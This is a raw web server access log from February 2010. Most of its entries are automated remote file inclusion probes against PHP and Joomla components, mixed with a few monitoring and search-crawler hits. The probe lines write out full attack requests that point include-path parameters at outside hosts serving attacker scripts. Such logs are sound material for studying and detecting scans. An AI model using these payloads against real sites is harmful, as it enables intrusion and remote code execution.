174.36.1.51 - - [15/Feb/2010:03:01:30 -0500] "GET /logs/access_log.Q109081000%20%20/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:01:30 -0500] "GET /logs/access_log.Q109112900%20%20/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:01:30 -0500] "GET /logs/access_log.Q109090900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:02:01 -0500] "GET /logs/access_log.Q109071200///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:02:02 -0500] "GET /logs/access_log.Q109081100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:03:02:05 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.44 - - [15/Feb/2010:03:02:06 -0500] "GET /logs/access_log.Q109081100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:02:09 -0500] "GET /logs/error_log.Q109083100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.239.230.130 - - [15/Feb/2010:03:02:09 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
213.239.230.130 - - [15/Feb/2010:03:02:10 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
218.38.243.44 - - [15/Feb/2010:03:02:13 -0500] "GET /logs/error_log.Q109083100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:02:37 -0500] "GET /logs/access_log.Q109083100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:02:45 -0500] "GET /logs/access_log.Q109083100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:03:02:54 -0500] "GET //admin.admin.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:03:02:54 -0500] "GET /logs/error_log.Q110020400%20%20//admin.admin.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:03:02:54 -0500] "GET /logs//admin.admin.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:03:03 -0500] "GET /logs/error_log.Q109102600%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:03:06 -0500] "GET /logs/access_log.Q109101100%20%20//index.php?abs_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:03:11 -0500] "GET /logs/error_log.Q109102600%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:03:11 -0500] "GET /logs/access_log.Q109060400///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:03:23 -0500] "GET /logs/access_log.Q109112900/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:03:24 -0500] "GET /logs/access_log.Q109081000/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:03:03:25 -0500] "GET /logs/access_log.Q110011600%20%20//admin.admin.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.108.150.235 - - [15/Feb/2010:03:03:36 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; H)"
74.205.120.218 - - [15/Feb/2010:03:03:37 -0500] "GET /logs/access_log.Q109101100%20%20//index.php?abs_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
95.108.150.235 - - [15/Feb/2010:03:03:37 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; H)"
95.108.150.235 - - [15/Feb/2010:03:03:38 -0500] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
95.108.150.235 - - [15/Feb/2010:03:03:39 -0500] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
95.108.150.235 - - [15/Feb/2010:03:03:40 -0500] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
95.108.150.235 - - [15/Feb/2010:03:03:41 -0500] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
208.70.79.113 - - [15/Feb/2010:03:03:47 -0500] "GET /logs/access_log.Q109070800%20%20/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:03:47 -0500] "GET /logs/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:03:47 -0500] "GET /error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:03:03:51 -0500] "GET /logs/access_log.Q109121100%20%20/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:02:58:14 -0500] "GET /logs/error_log.Q109073000 HTTP/1.0" 200 2505495 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.36.1.51 - - [15/Feb/2010:03:04:28 -0500] "GET /logs/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:04:28 -0500] "GET /omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:04:28 -0500] "GET /logs/error_log.Q109100600%20%20/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:04:33 -0500] "GET /logs/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:04:33 -0500] "GET /omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:04:33 -0500] "GET /logs/error_log.Q109100600%20%20/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:04:44 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:04:44 -0500] "GET /logs/access_log.Q110010900%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:04:44 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:04:45 -0500] "GET /logs/access_log.Q109062700%20%20/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:03:04:45 -0500] "GET /logs/access_log.Q109121400%20%20//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:03:04:45 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:03:04:45 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:04:46 -0500] "GET /logs/access_log.Q109062700%20%20/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:04:54 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:04:54 -0500] "GET /logs/access_log.Q109121200/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:04:54 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:04:54 -0500] "GET /logs/access_log.Q109121200/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:04:54 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:04:54 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:03:05:07 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:03:05:07 -0500] "GET /logs/access_log.Q109120500//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:03:05:07 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:05:08 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:05:10 -0500] "GET /logs/access_log.Q109110200/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:05:10 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:03:05:11 -0500] "GET /logs/access_log.Q109102400//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.111.3.35 - - [15/Feb/2010:03:05:14 -0500] "GET /logs/error_log.Q109100600//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
221.143.46.124 - - [15/Feb/2010:03:05:44 -0500] "GET //list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
221.143.46.124 - - [15/Feb/2010:03:05:44 -0500] "GET /logs/error_log.Q109100100//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
221.143.46.124 - - [15/Feb/2010:03:05:45 -0500] "GET /logs//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
62.193.225.60 - - [15/Feb/2010:03:06:02 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:06:02 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:06:02 -0500] "GET /logs/access_log.Q109122700%20%20/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:06:21 -0500] "GET /logs/access_log.Q109122700/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:06:25 -0500] "GET /logs/access_log.Q109122700/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:06:29 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:06:29 -0500] "GET /logs/access_log.Q109122700%20%20/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:06:29 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:07:03 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:07:03 -0500] "GET /logs/access_log.Q110010900/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:07:03 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:07:04 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:07:04 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:07:05 -0500] "GET /logs/access_log.Q109122700/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:07:09 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:07:09 -0500] "GET /logs/access_log.Q109122700/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:07:09 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:07:11 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:07:11 -0500] "GET /logs/access_log.Q109110200/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:07:11 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.38.136.126 - - [15/Feb/2010:03:08:08 -0500] "GET /logs/error_log.Q109120600////?_SERVER[DOCUMENT_ROOT]=' HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
218.38.136.126 - - [15/Feb/2010:03:08:09 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=' HTTP/1.1" 200 454 "-" "libwww-perl/5.79"
218.38.136.126 - - [15/Feb/2010:03:08:09 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=' HTTP/1.1" 200 38409 "-" "libwww-perl/5.79"
209.59.12.99 - - [15/Feb/2010:03:10:08 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.150.99.144 - - [15/Feb/2010:03:10:36 -0500] "GET /error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:10:36 -0500] "GET /logs/error_log.Q109100600/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:10:36 -0500] "GET /logs/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:10:36 -0500] "GET /logs/access_log.Q109070800%20%20/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:03:10:36 -0500] "GET /logs/access_log.Q109121100%20%20/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
221.143.46.124 - - [15/Feb/2010:03:10:38 -0500] "GET /logs/error_log.Q109100600//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
125.141.91.138 - - [15/Feb/2010:03:10:45 -0500] "GET /logs/access_log.Q110010900/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:10:57 -0500] "GET /logs/access_log.Q109062700/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.68.151 - - [15/Feb/2010:03:11:42 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3171A9572352E100792D03J+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.93.147.154 - - [15/Feb/2010:03:11:48 -0500] "GET /logs/access_log.Q109110200%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:11:50 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:11:50 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 38410 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:11:50 -0500] "GET /logs/access_log.Q109121400/////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.254.172.27 - - [15/Feb/2010:03:12:03 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.254.172.27 - - [15/Feb/2010:03:12:03 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.254.172.27 - - [15/Feb/2010:03:12:06 -0500] "GET /logs/error_log.Q109060500%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:12:08 -0500] "GET /logs/error_log.Q110020600/////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:03:12:11 -0500] "GET /write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:03:12:11 -0500] "GET /logs/access_log.Q109112600/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:03:12:11 -0500] "GET /logs/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:12:12 -0500] "GET /logs/access_log.Q109122700/////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:12:19 -0500] "GET /logs/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 221 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:12:19 -0500] "GET /logs/access_log.Q110020200/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:12:19 -0500] "GET /delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 216 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:12:22 -0500] "GET /delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 216 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:12:22 -0500] "GET /logs/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 221 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:12:22 -0500] "GET /logs/access_log.Q110020200/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:12:29 -0500] "GET /logs/access_log.Q109062700/omponents/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:12:33 -0500] "GET /logs/access_log.Q110010900%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
121.254.172.27 - - [15/Feb/2010:03:12:46 -0500] "GET /logs/error_log.Q109060500%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.254.172.27 - - [15/Feb/2010:03:12:46 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.254.172.27 - - [15/Feb/2010:03:12:46 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
194.249.18.67 - - [15/Feb/2010:03:13:38 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
